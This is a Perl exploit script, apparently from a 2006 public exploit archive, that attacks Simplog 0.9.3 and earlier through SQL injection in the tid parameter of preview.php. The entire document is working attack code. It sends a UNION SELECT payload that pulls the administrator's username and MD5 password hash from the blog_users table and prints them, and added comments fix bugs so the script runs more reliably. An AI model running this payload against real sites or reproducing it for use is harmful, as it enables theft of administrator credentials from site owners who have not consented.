Simplog <= 0.9.3 Remote SQL Injection Exploit (via the unsanitised `tid` parameter of preview.php):

Date : 2006-04-21 Author : nukedx
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=25
#Usage: simplog.pl <host> <path>
use IO::Socket;
# Exactly two positional arguments (host and path) are required; anything
# else prints the usage banner, which terminates the script.
if (@ARGV == 2) {
  exploit();
}
else {
  usage();
}
# Prints the advisory banner to STDOUT: a leading blank line, the advisory
# number and the exploit title. Takes no arguments; the return value is not
# used by any caller.
sub header()
{
  my @banner = (
    "",
    "- NukedX Security Advisory Nr.2006-25",
    "- Simplog <= 0.93 Remote SQL Injection Exploit",
  );
  print map { "$_\n" } @banner;
  return;
}
# Prints the banner followed by a short usage summary for the two positional
# arguments (victim host, path to Simplog), then exits the process. Never
# returns to the caller.
sub usage()
{
  header();
  my @help = (
    "- Usage: $0 <host> <path>",
    "- <host> -> Victim's host ex: www.victim.com",
    "- <path> -> Path to Simplog ex: /simplog/",
  );
  print "$_\n" for @help;
  exit();
}
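# Sends the injected preview.php request to the target and scans the HTTP
# response for the admin login / password hash that the UNION SELECT folds
# into the page.
#
# Reads @ARGV: [0] = victim host (a leading "http://" is tolerated, and an
# optional ":port" suffix overrides the default port 80), [1] = web path to
# the Simplog install, e.g. "/simplog/". Prints the banner, connection
# progress and either the recovered credentials or a failure line to STDOUT.
# Dies if the TCP connection cannot be established.
#
# Fixes relative to the original listing: the host-stripping substitution
# was syntactically broken (unescaped "/" inside s///), the hash character
# class "[d,a-f]" matched the letters d and a-f plus a comma rather than hex
# digits, all variables were globals, the socket was never closed, and the
# request used bare LF line endings where HTTP/1.1 requires CRLF.
#
# Only run this against systems you are authorised to test.
sub exploit
{
  my ($target, $spdir) = @ARGV;

  # Reduce whatever the user typed to a bare host and a numeric port.
  $target =~ s{\Ahttps?://}{}i;
  $target =~ s{/.*\z}{};                      # drop any trailing path part
  my ($spserver, $spport) = split /:/, $target, 2;
  die "- Host must not be empty\n" unless defined $spserver && length $spserver;
  $spport = 80 unless defined $spport && $spport =~ /\A\d+\z/;
  my $sphost = "http://" . $spserver;

  # The path must be absolute and end in "/" so the script name appends cleanly.
  $spdir = '' unless defined $spdir;
  $spdir = "/$spdir" unless $spdir =~ m{\A/};
  $spdir .= '/'      unless $spdir =~ m{/\z};

  # Injection point: the 'tid' parameter of preview.php. The payload UNIONs
  # the admin row's login and password columns into the result, wrapped in
  # the sentinel numbers 25552/25553/25554 so they can be picked out of
  # arbitrary HTML; "/**/" stands in for spaces and "/*" comments out the
  # remainder of the original query.
  my $sptar = "preview.php?adm=tem&blogid=1&tid=";
  my $spxp  = "-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*";
  my $spreq = $sphost . $spdir . $sptar . $spxp;

  header();
  print "- Trying to connect: $spserver\n";

  my $sp = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $spserver,
    PeerPort => $spport,
  ) or die "- Connection failed: $@\n";
  print "- Connected...\n";

  # Absolute-URI request line plus a Host header, terminated by an empty
  # line; HTTP/1.1 requires CRLF between header lines.
  my $crlf = "\r\n";
  print {$sp} join $crlf,
    "GET $spreq HTTP/1.1",
    "Accept: */*",
    "Referer: $sphost",
    "Accept-Language: tr",
    "User-Agent: NukeZilla",
    "Cache-Control: no-cache",
    "Host: $spserver",
    "Connection: close",
    "", "";

  # Look for the sentinel-wrapped pair on any response line. Simplog stores
  # passwords as 32-hex-char MD5 digests, so the hash is anchored to exactly
  # that alphabet and length.
  my $found = 0;
  while (my $answer = <$sp>) {
    if ($answer =~ /25552(.*?)25553([0-9a-fA-F]{32})25554/) {
      my ($login, $hash) = ($1, $2);
      print "- Exploit succeed!\n";
      print "- Username: $login\n";
      print "- MD5 HASH of PASSWORD: $hash\n";
      $found = 1;
      last;
    }
  }
  close $sp;

  print "- Exploit failed\n" unless $found;
  return;
}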

# nukedx.com [2006-04-21]

# milw0rm.com [2006-04-21]
